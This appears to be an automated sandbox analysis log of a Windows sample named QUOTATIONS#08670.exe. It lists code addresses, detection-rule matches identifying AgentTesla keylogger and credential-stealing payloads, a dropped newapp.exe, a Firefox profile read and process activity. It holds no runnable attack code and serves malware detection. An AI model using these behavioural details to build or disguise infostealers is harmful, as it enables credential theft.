                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_08107EBF8_2_08107EBF
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081066D08_2_081066D0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081066E08_2_081066E0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081027B08_2_081027B0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081037D88_2_081037D8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0810ABE08_2_0810ABE0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_08103FE88_2_08103FE8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811B8388_2_0811B838
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081100408_2_08110040
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081189418_2_08118941
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_08114D988_2_08114D98
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811EDA08_2_0811EDA0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081199D78_2_081199D7
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811A5F88_2_0811A5F8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811AE718_2_0811AE71
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811C6E88_2_0811C6E8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811EC088_2_0811EC08
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811E0B08_2_0811E0B0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811E0A08_2_0811E0A0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811A5708_2_0811A570
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811E9908_2_0811E990
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811E9838_2_0811E983
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811D5D08_2_0811D5D0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811D5C18_2_0811D5C1
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811B6708_2_0811B670
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811C6AF8_2_0811C6AF
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811E7588_2_0811E758
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811E7488_2_0811E748
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811E3A08_2_0811E3A0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811D3F98_2_0811D3F9
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811EBF88_2_0811EBF8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_078921E58_2_078921E5
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_010886F99_2_010886F9
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_01084B709_2_01084B70
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_0108AC389_2_0108AC38
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_010879B89_2_010879B8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_0108CD889_2_0108CD88
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_075435389_2_07543538
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_0754DD5F9_2_0754DD5F
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_0754DD709_2_0754DD70
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_076022109_2_07602210
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_0760CBA09_2_0760CBA0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_076632E89_2_076632E8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_0766EA489_2_0766EA48
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_0766D2109_2_0766D210
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_076632D99_2_076632D9
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA27C09_2_07AA27C0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA8BC19_2_07AA8BC1
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA42909_2_07AA4290
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AAA2509_2_07AAA250
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA49E39_2_07AA49E3
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA27B09_2_07AA27B0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA37D89_2_07AA37D8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA42809_2_07AA4280
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA7E289_2_07AA7E28
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA7E199_2_07AA7E19
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA85909_2_07AA8590
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA68289_2_07AA6828
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA00259_2_07AA0025
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA80079_2_07AA8007
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA681B9_2_07AA681B
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA00409_2_07AA0040
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABC6E89_2_07ABC6E8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABAE719_2_07ABAE71
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABEDA09_2_07ABEDA0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AB4D989_2_07AB4D98
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABA5F89_2_07ABA5F8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AB99D79_2_07AB99D7
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AB89419_2_07AB8941
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABB8389_2_07ABB838
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AB00409_2_07AB0040
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABE3A09_2_07ABE3A0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABD3F99_2_07ABD3F9
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABEBF89_2_07ABEBF8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABE7489_2_07ABE748
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABE7589_2_07ABE758
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABC6B19_2_07ABC6B1
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABE9829_2_07ABE982
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABE9909_2_07ABE990
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABD5C19_2_07ABD5C1
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABD5D09_2_07ABD5D0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABA56F9_2_07ABA56F
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABE0A09_2_07ABE0A0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABE0B09_2_07ABE0B0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABEC089_2_07ABEC08
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_076021E59_2_076021E5
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2019882237.0000000004E50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTokenTableApp.dll> vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename4781ad81-0abf-42ba-9cb5-204cd7690d39.exe4 vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTokenTableApp.dll> vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2020384479.0000000004F60000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRP8SH.dll6 vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename4781ad81-0abf-42ba-9cb5-204cd7690d39.exe4 vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2008575393.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename4781ad81-0abf-42ba-9cb5-204cd7690d39.exe4 vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2006152312.000000000065E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2571149051.00000000010F9000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2570779363.0000000000440000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename4781ad81-0abf-42ba-9cb5-204cd7690d39.exe4 vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 9.2.newapp.exe.3cc54ba.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3cc54ba.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.4345322.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.4345322.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.43823e0.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.43823e0.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3d02578.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3d02578.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.428e0d2.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.428e0d2.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.3828c62.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.3828c62.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.391cf70.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.391cf70.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.4250ff2.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.4250ff2.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3c4b33a.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3c4b33a.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3c0e26a.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3c0e26a.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3c4b33a.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3c4b33a.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.QUOTATIONS#08670.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.QUOTATIONS#08670.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3bd118a.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3bd118a.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3d02578.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3d02578.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.42cb1a2.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.42cb1a2.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3c0e26a.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3c0e26a.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.3865d32.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.3865d32.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.3865d32.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.3865d32.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.428e0d2.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.428e0d2.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.3828c62.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.3828c62.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3cc54ba.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3cc54ba.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.43823e0.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.43823e0.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.42cb1a2.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.42cb1a2.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.4345322.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.4345322.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3bd118a.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3bd118a.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.4250ff2.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.4250ff2.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/3@2/2
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATIONS#08670.exe.log
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Mutant created: NULL
                  Source: QUOTATIONS#08670.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: QUOTATIONS#08670.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: QUOTATIONS#08670.exe | ReversingLabs: Detection: 23%
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | File read: C:\Users\user\Desktop\QUOTATIONS#08670.exe
                  Source: unknown | Process created: C:\Users\user\Desktop\QUOTATIONS#08670.exe "C:\Users\user\Desktop\QUOTATIONS#08670.exe"
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Process created: C:\Users\user\Desktop\QUOTATIONS#08670.exe "C:\Users\user\Desktop\QUOTATIONS#08670.exe"
                  Source: unknown | Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                  Source: unknown | Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: rsaenh.dll
